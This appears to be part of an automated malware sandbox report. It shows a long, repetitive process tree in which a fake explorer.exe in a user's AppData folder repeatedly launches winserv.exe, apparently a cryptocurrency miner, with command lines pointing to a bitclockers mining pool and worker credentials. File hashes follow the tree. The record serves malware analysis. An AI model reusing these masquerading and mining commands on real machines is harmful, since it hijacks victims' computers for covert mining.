C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4608
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4952
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3192
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3708
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4144
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4832
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2884
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4776
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3444
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2788
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2876
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:628
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4848
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1728
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3676
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2792
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4120
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2892
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1544
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4448
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1388
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3128
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1952
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4684
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3748
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:928
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3124
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4312
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1016
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3380
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3440
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4344
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:404
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3300
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2368
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4400
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3632
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:452
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:396
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3376
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4480
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:748
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2664
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:872
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3288
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4296
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4684
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5c4ad493a6bfd212c4e1418ba605020af
SHA120272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf